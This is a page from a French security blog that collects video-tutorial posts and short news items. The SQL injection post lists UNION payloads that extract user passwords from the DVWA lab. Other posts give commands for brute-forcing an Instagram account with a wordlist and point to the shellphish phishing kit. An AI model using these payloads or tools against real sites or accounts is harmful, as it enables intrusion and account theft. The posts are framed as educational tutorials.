Profilage et génération de wordlist avec CUPP

Tutoriel en français détaillant le fonctionnement du framework CUPP qui permet de générer des dictionnaires de mots de passe personnalisé.

Ce tutoriel est à but instructif uniquement.
Je ne vous incite en aucun cas à prendre le contrôle d’un système qui ne vous appartient pas.

Le lien vers mon blog :
https://lestutosdeprocessus.fr

Le repo github de CUPP :
https://github.com/Mebus/cupp

Le repo github de Instagram :
https://github.com/Pure-L0G1C/Instagram

Les commandes de la vidéos :
pip install -r requirements.txt
python instagram.py -h
python instagram.py username wordlist

Musique d’intro :
Titre: Mainstream Pop
Auteur: Bricks
Source: http://www.myspace.com/bricksof78
Licence: http://creativecommons.org/licenses/by-nc-nd/2.0/
Téléchargement (4MB): https://www.auboutdufil.com/index.php?id=312

La musique de fond :
Titre: La Ballade De Greg Blount Remixx
Auteur: Throw Panda Bat
Source: http://www.myspace.com/throwpandabat
Licence: http://creativecommons.org/licenses/by-nc-sa/3.0/
Téléchargement (6MB): https://www.auboutdufil.com/index.php?id=371

Bientôt la fin d’IPv4 ?

En 2018, tout le monde se disait que ça n’arriverait qu’en 2021…

Aujourd’hui on se rend compte que ça va nous tomber dessus plutôt en Mai 2020…

L’ARCEP, l’organisme chargée de la régulation de l’affectation des IP (entre autres) vient de sortir un nouveau rapport qui prévoit la pénurie des adresses IPv4 en Mai 2020.

Alors bien sûr, plutôt que d’essayer de passer progressivement sous IPv6, on fait l’autruche et on attends une directive européenne qui nous y obligera !

Et puis, même si les ressources s’épuisent, ça n’empêche pas de vendre un sous-réseau public en /8 à Amazon 🙂

Source : https://www.whois.com/whois/44.192.0.0


Bref, là où ça craint c’est que chacun construit des alternatives bouche-trou de son côté…

Free songe (et le fait déjà) à mutualiser certains clients sur une même adresse public et trifouiller des redirections de ports dans tous les sens pour que ça soit transparent pour le client final.

Chez FirstHeberg, où ce blog est hébergé, Jérémy Martin, le directeur technique, indique qu’actuellement une adresse publique est allouée à chaque site, chaque serveur loué.

Mais lorsque la pénurie sera avérée, ils devraient fournir uniquement des IPv6 et proposer une option (payante évidemment) supplémentaire pour avoir une IPv4.

Le problème, c’est que tous les clients ou équipements qui ne disposent pas d’une adresse IPv6 ne pourront pas accéder à ces derniers.

On arrivera donc à un Internet scindé en deux parties.

Et quand on voit que certains aéroport tournent encore sous Windows 3.1 (C’était à Orly) on se dit qu’on est pas prêt d’avoir de l’IPv6 partout…

L’Arcep va fournir un rapport hebdomadaire pour suivre l’évolution (où plutôt la diminution) des adresses IPv4 ici : https://www.arcep.fr/la-regulation/grands-dossiers-internet-et-numerique/lipv6/suivi-epuisement-adresses-ipv4.html

L’interview de Jérémy Martin figure également à cette adresse.

Le lien du site de l’ARCEP : https://www.arcep.fr

Apprendre le C facilement

En parallèle des autres projets, j’essaye de me mettre au C. Et quand on a jamais mis les mains là dedans, c’est compliqué !

J’ai quelques notions de Java grâce à mes études mais je n’ai jamais appris à développer en C

Et je suis tombé sur un petite pépite, la chaîne Youtube FormationVidéo de Jason Champagne :

https://www.youtube.com/channel/UCS2e0hEJMhwd6bNscS60xTg

Les tutoriels sont bien expliqués, le son est clair, c’est plaisant à regarder et super instructif

Et en plus il vient de Reims, c’est donc forcément un gars bien !

Bref, la chaine comporte plusieurs autres langages également disponibles (C++, Java, PHP..)

Le lien du site de Jason :

https://jasonchampagne.fr/

Les différentes playlists disponibles :

https://www.youtube.com/channel/UCS2e0hEJMhwd6bNscS60xTg/playlists

Sale temps pour les mineurs !

Dans la nuit de Jeudi à Vendredi, l’équivalent de 29 millions d’euros ont été piratés sur la plateforme d’échanges de cryptomonnaies japonaise BitPoint Japan.

Il s’agirait d’une erreur dans le système de transaction des fonds sortants de l’entreprise.

Aucune information supplémentaire n’a été fournie et les analyses se poursuivent…

Les 2 tiers du montant dérobé appartenaient à des clients et le reste à la plateforme. Seuls les hot wallet ont été impactés.

Les devises impactées sont du Bitcoin, du Bitcoin cash, de l’Ethereum, du Litecoin et du Ripple.

L’action du groupe à perdu 18,6 % en bourse à la suite de cette annonce.

Car BitPoint Japan n’est qu’une filiale d’un groupement plus important spécialisé dans la mise au point de logiciels de cryptage et dans le développement de l’industrie automobile, le tout représentant environ 41 millions de dollars en bourse.

Injection SQL sur DVWA

Tutoriel en français expliquant le principe de l’injection SQL sur le framework DVWA.

Ce tutoriel a été réalisé sur une application prévue pour des tests d’intrusion.

Je ne vous encourage en aucun cas à reproduire ce type d’attaque sur un système qui ne vous appartient pas.

Le lien de DVWA :

http://www.dvwa.co.uk/

Les commandes utilisées :
1′ or 1=1#
1′ or 1=1 union select table_name from information_schema.tables#
1′ or 1=1 union select null, table_name from information_schema.tables#
1′ or 1=1 union select table_name, column_name from information_schema.columns#
1′ or 1=1 union select user, password from users#

Musique d’intro :
Titre: Mainstream Pop
Auteur: Bricks
Source: http://www.myspace.com/bricksof78
Licence: http://creativecommons.org/licenses/by-nc-nd/2.0/
Téléchargement (4MB): https://www.auboutdufil.com/index.php?id=312

La musique de fond :
Titre: Leaf
Auteur: KV
Source: https://soundcloud.com/kvmusicprod
Licence: https://www.creativecommons.org/licenses/by/4.0/
Téléchargement (5MB): https://www.auboutdufil.com/index.php?id=509

NoLimitSecu : Le meilleur podcast

Logo de NoLimitSecu

Tous les jours j’ai environ 40 minutes de route depuis mon domicile jusqu’à mon travail.

Au début, j’écoutais la radio, puis je me suis mis à écouter des conférences Linux sur Youtube (celle-ci est top : https://www.youtube.com/watch?v=PlsSS16k8Vk) mais je suis vite arrivé au bout de ce que je cherchais…

Et c’est là que j’ai découvert le fabuleux monde des podcasts !

Il en existe beaucoup, mais mon préféré est celui de NoLimitSécu.

Les mecs sont des pros, qui font intervenir des pros, dans une émission déstinée à des pros ! #LaSécuPourLesGrosBarbus

Bref, c’est super intéressant et plaisant à écouter.

Il fallait donc que je vous en parle 🙂

Voici le lien pour vous abonner :

https://www.nolimitsecu.fr

Leur seul défaut c’est de pas en publier plus souvent !


Sinon, j’écoute également ceux là :

Niptech : https://niptech.com

Les Technos : https://lestechnos.be

Si vous en avez d’autres, je suis preneur !

Toc toc ? Y-a-t’il un Apache vulnérable ici ?

Ça commence déjà !

Le site est en ligne depuis hier et on a déjà un petit malin qui fait passer du nmap et de l’uniscan par là 🙂

Capture d’écran du fichier d’accès d’Apache montrant les requêtes Nmap
Capture d’écran du fichier d’accès d’Apache montrant les requêtes Uniscan

En revanche, il a oublié de mettre en marche son VPN on dirait…

Attention mon ami, on te voit !

Le grand déménagement

Si vous lisez ces lignes, c’est que tout s’est bien passé 🙂

Youtube a choisi de modifier ses conditions générales et désormais les tutos risquent de ne plus pouvoir être hébergés sur cette plateforme.

J’ai donc choisi la voie de l’indépendance !

Le site est encore en cours de construction mais c’est pour bientôt !

L’ensemble des tutos seront donc disponibles sur ce serveur, avec un doublon sur la chaine Youtube (jusqu’à sa fermeture).

Encore un peu de patience 😉

Proc

#TeamKali

Piratage de réseaux sociaux à distance (Instagram, Facebook, Twitter)

Tutoriel en français expliquant le fonctionnement du script shellphish.

Ce tutoriel est à but instructif uniquement.
Je ne vous incite en aucun cas à prendre le contrôle d’un système ou d’un réseau qui ne vous appartient pas.

Le repo github de thelinuxchoice :
https://github.com/thelinuxchoice/shellphish

Canon EOS 700D
Objectif Canon 50mm F1.8
Microphone BOYA BY-M1

Musique d’intro :
Titre: Mainstream Pop
Auteur: Bricks
Source: http://www.myspace.com/bricksof78
Licence: http://creativecommons.org/licenses/by-nc-nd/2.0/
Téléchargement (4MB): https://www.auboutdufil.com/index.php?id=312

Musique de fond :
Titre: No Love
Auteur: Shearer
Source: https://shearer.bandcamp.com/
Licence: https://creativecommons.org/licenses/by/3.0/deed.fr
Téléchargement (7MB): https://www.auboutdufil.com/index.php?id=508

Mots clés :

Kali Linux ShellPhish Réseaux Sociaux Facebook Twitter Instagram Piratage Social Engeneering Ingénierie Sociale Phishing Distance Serveo Ngrock Hacking

Retour aux sources : Le VPN (PPTP, L2TP & OpenVPN)

Tutoriel en français détaillant le fonctionnement général d’un VPN et expliquant la partie technique des VPN PPTP, L2TP et OpenVPN.

Filmé avec un Canon EOS 700D
Objectif Canon 50mm F1.8
Microphone BOYA BY-M1

Musique d’intro :
Titre: Mainstream Pop
Auteur: Bricks
Source: http://www.myspace.com/bricksof78
Licence: http://creativecommons.org/licenses/by-nc-nd/2.0/
Téléchargement (4MB): https://www.auboutdufil.com/index.php?id=312

Musique de fond :
Titre: Unwanted
Auteur: Cudar
Source: http://www.cudar.de/
Licence: http://creativecommons.org/licenses/by-nc-sa/3.0/deed.fr
Téléchargement (11MB): https://www.auboutdufil.com/index.php?id=477

« Older posts